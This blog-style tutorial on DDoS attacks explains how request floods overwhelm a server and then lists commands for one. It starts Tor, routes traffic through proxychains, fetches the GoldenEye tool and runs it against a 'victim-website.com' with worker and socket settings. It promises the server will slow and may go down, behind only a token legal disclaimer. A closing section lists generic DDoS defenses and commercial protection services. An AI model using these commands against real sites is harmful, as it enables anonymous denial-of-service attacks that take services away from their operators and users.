Hello my little Freaks Hackfreaks here. Today we'll talk about How to Atack DDoS and How to protect ourselves. Brought to you by Hackfreaks official. So lets get started.
Briefly about "DDos"
DDoS (abbr. English Distributed Denial of Service, literally "Distributed Denial of Service") is a hacker attack on a computing system with the aim of bringing it to failure, that is, creating conditions under which bona fide users of the system will not be able to access the provided system resources (servers), or this access will be difficult.
How does this attack work and who is using it?
Each web server has a limit on the number of requests that the web server can serve simultaneously. If the number of requests exceeds the permissible limit, the following is quite possible:
1. Slowdown of the server (slowing down the processing of requests)
2. Complete denial of service requests
Most often, attackers seek the second - a complete denial of service. The motives can be different: from protecting users from fraudulent sites to banal boredom.
But it should be said that these attacks are used not only by cybercriminals, but also by "white hackers", ie pentesters. With this attack, ethical hackers test web servers for their capacity and ability to process a large number of requests simultaneously.
DDoS works like this: an attacker creates a network of "zombie computers" (in fact, these are not necessarily computers: all devices capable of sending requests are suitable for this attack), and subsequently uses this network to carry out the attack.
Imagine a situation: the maximum traffic weight that the server can receive is 1 GB. The attacker tries to reach or overcome this barrier. If it works, the server slows down at first, and then it can go down.
Now for the fun part: how to carry out such an attack? We will warn you right away - everything described and described below is provided for informational purposes only. You cannot break someone else's servers, for this there may be problems with the law. We warned you.
Required tools
EtherApe is a graphical network monitor that graphically displays network activity. Hosts and links change in size with traffic. Display of color protocols.
Service Tor - Tor allows clients and relays to offer hidden services. That is, you can offer a web server, SSH server, etc. Without revealing your IP address to your users.
Proxychains - The latest version of Proxychains supports SOCKS5, SOCKS4 and HTTP CONNECT. Proxy chains can be mixed with different types of proxies.
GoldenEye - GoldenEye is a python application for security testing purposes only.
How to perform a DDOS attack on a website?
1. Run etherape: etherape, a pop-up window will appear that graphically displays network activity.
2. Start the TOR service:
service tor start
3. Download Goldeneye
https://github.com/jseidl/GoldenEye
wget https://github.com/jseidl/GoldenEye
4. After downloading, unzip it to a folder
unzip GoldenEye-master.zip
5. Start attack
/ GoldenEye-master # proxychains ./goldeneye.py http://testdomain.com
Add values for workers (-w), sockets (-s) and method (-m)
./goldeneye.py victim-website.com -w 100 -s 70 -m post
If you don't stop the attack, in some cases it will "explode". To stop the attack just press CTRL + C.
Done. After a while, the server will slow down, and then, possibly, it will go down.
General protection against DDOS attacks
Slowing down the speed of the IP connection.
Use IDS, web application firewalls.
Tweak Connection to IP Threshold.
Protect your DNS servers.
Install protective equipment. Make sure you have the appropriate protections installed for both your networks and your applications. This includes key tools such as firewalls, network monitoring and anti-virus software, and threat monitoring systems. You can use these to monitor basic network traffic and set up alerts for unusual behavior.
Keep everything updated. All of these systems must be updated to ensure that any bugs or problems are corrected. Detecting threats as early as possible is the best way to prevent DDoS attacks against critical network infrastructures and impact end users.
DDoS Prevention Tools
There are several tools that I recommend for preventing and stopping DDoS attacks.
1. Security Event Manager
For tracking network behavior and flagging threats before they become overwhelming, I like SolarWinds Security Event Manager (SEM).
The ability to quickly respond to threats is vital as security initiatives can quickly become useless if they take too long to deploy. SEM includes automatic replies that can block suspicious IP or USB, disable malicious devices or disable their privileges, and destroy applications that behave in unexpected ways. This means that delays when dealing with something like a DDoS attack are kept to a minimum.
SEM also monitors the integrity of files and USB, so if something looks wrong, it can be stopped.
SolarWinds SEM is offered free of charge for a thirty-day trial. After that, you can see the prices for each node.
2. Cloudflare
Cloudflare offers a flexible and scalable tool that combines multiple DDoS prevention techniques in one solution. It prevents malicious and malicious traffic from entering your network, while the rest of the network remains functional and high performing. Cloudflare uses a reputation database to track potential threats from intruders.
For businesses, Cloudflare costs $ 200 per month, but at the enterprise level, you'll need to contact Cloudflare for a quote.
3. Imperva
Imperva DDoS protection protects the entire network and protects against attacks by processing high-capacity packets. It provides DDoS protection on-demand or on-demand, whichever suits your business best, and also includes automatic updating of dashboards that display information about attack traffic. The main disadvantage of the Imperva tool is that it is limited to DDoS protection.
إرسال تعليق